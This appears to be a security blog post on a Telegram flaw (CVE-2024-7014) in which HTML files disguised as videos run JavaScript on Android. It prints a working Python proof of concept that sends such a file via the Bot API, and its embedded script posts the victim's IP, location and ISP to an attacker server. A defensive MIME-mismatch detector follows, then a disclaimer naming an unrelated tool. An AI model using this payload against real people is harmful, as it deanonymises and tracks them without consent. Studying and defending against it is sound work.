This article examines a scenario that works similarly to the CVE-2024-7014 vulnerability. A file with an ".htm" extension is disguised as a video and sent via the Telegram API, and while the user expects a video, the JavaScript code inside the HTML is actually executed.
Technical Details
Evilloader is a loader that allows attackers to download and run additional malicious payloads on target systems. CVE-2024-7014 describes an update in the anti-analysis mechanisms of this module. In this scenario, a fake video leads the victim to a malware (fake Play Protect) download page and also delivers an IP logger.
Vulnerability Details
The root cause of the vulnerability is that a file with the ".htm" extension, uploaded to Telegram's servers declared as a video, is presented to the recipient as a video. When opened, the ".htm" file is handed to a browser under a "content://" URI, for example: content://org.telegram.messenger.provider/media/Android/data/org.telegram.messenger/files/Telegram/Telegram%20Video/4_5924894289476721732.htm The browser renders that content, so the HTML page inside the supposed video is triggered and opened.
Scenario (ip logger)
The victim may try to open this file with a video player; when that fails (since it is not an actual video format), the file can be redirected to the default browser, or, if it is recognised as an "HTML file", double-clicking it opens it in the browser. Either way, the malicious JavaScript runs.
If the victim downloaded the file from Telegram thinking it was a video, the browser actually runs the HTML content, and the IP information goes to the attacker's server.
tg.py
import requests

BOT_TOKEN = "your_bot_token"
CHAT_ID = "your_chat_id"

# HTML page that queries a public IP lookup service and posts the result
# to the attacker's listener (the PoC's local test server).
html_content = """
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<script>
fetch('http://ip-api.com/json')
    .then(response => response.json())
    .then(data => {
        fetch('http://192.168.137.1:5000/log_ip', {
            method: 'POST',
            headers: {
                'Content-Type': 'application/json'
            },
            body: JSON.stringify({
                ip: data.query,
                country: data.country,
                region: data.regionName,
                city: data.city,
                isp: data.isp
            })
        });
    })
    .catch(error => console.error('Error fetching IP:', error));
</script>
</head>
<body>
</body>
</html>
"""

# The HTML is written to a local file with an .mp4 name; the name on disk
# is irrelevant, what matters is the filename and MIME type sent to Telegram.
html_path = "testv.mp4"
with open(html_path, "w") as file:
    file.write(html_content)

# The upload is declared as "video/mp4" while the filename keeps the .htm
# extension: Telegram presents it as a video, the client opens it as HTML.
with open(html_path, "rb") as video_file:
    files = {
        "video": (
            "a.htm",
            video_file,
            "video/mp4"
        )
    }
    url = f"https://api.telegram.org/bot{BOT_TOKEN}/sendVideo"
    data = {"chat_id": CHAT_ID, "supports_streaming": False}
    response = requests.post(url, data=data, files=files)

if response.status_code == 200:
    print("message sent")
else:
    print(f"error: {response.text}")
In this code, a .htm file is presented as a “video” and sent via the Telegram API. On Android devices, when the user tries to open this file, it actually runs a JavaScript-containing HTML page.
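The weakness the scenario relies on is a three-way mismatch between the declared MIME type ("video/mp4"), the filename extension (".htm") and the actual bytes (HTML markup). A receiving client or a gateway scanning Telegram downloads can detect exactly that mismatch before handing a file to a player or browser. The following check is an added example written for this article, not code from the original post or from Telegram; the container signatures and sample inputs are constructed for illustration.

```python
import re
from typing import Callable, Dict, List, Optional

# Magic-byte checks for common video containers (constructed subset).
VIDEO_SIGNATURES: Dict[str, Callable[[bytes], bool]] = {
    "mp4": lambda b: len(b) >= 12 and b[4:8] == b"ftyp",
    "webm/mkv": lambda b: b.startswith(b"\x1a\x45\xdf\xa3"),
    "avi": lambda b: b.startswith(b"RIFF") and b[8:12] == b"AVI ",
}
# Markers that only make sense in an HTML document, not in a media container.
HTML_MARKERS = re.compile(rb"<!doctype\s+html|<html|<script", re.IGNORECASE)


def classify_attachment(filename: str, declared_mime: str, head: bytes) -> dict:
    """Verdict for a downloaded attachment based on name, declared type and content.

    filename      - the name the message reports for the file (e.g. "a.htm")
    declared_mime - the MIME type the sender attached (e.g. "video/mp4")
    head          - the first bytes of the file content
    """
    sample = head[:4096]
    container: Optional[str] = next(
        (name for name, check in VIDEO_SIGNATURES.items() if check(sample)), None
    )
    looks_html = HTML_MARKERS.search(sample) is not None
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""

    reasons: List[str] = []
    if declared_mime.startswith("video/") and container is None:
        reasons.append("declared as video but no video container signature found")
    if declared_mime.startswith("video/") and ext in ("htm", "html"):
        reasons.append("declared as video but filename has an HTML extension")
    if looks_html:
        reasons.append("content is HTML markup")

    return {
        "container": container,
        "html": looks_html,
        "suspicious": bool(reasons),
        "reasons": reasons,
    }
```

A client that applies this check would refuse to route a "video" that carries HTML markup to the browser and would instead show it as an untrusted document.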
The video below shows how “malware and ip logger” scenarios are carried out:
Disclaimer (Legal and Ethical Use)
Matkap is intended solely for educational and research purposes. This tool is designed to help cybersecurity professionals analyze Telegram bot interactions and identify potential security risks.
- Do not use this tool for illegal activities or unauthorized access.
- You assume full responsibility for any actions performed using this tool. The developers and contributors are not liable for misuse, damage, or legal consequences.
- Ensure compliance with Telegram's API Terms of Service and all applicable local laws.
- If you do not agree to these terms, do not use the tool.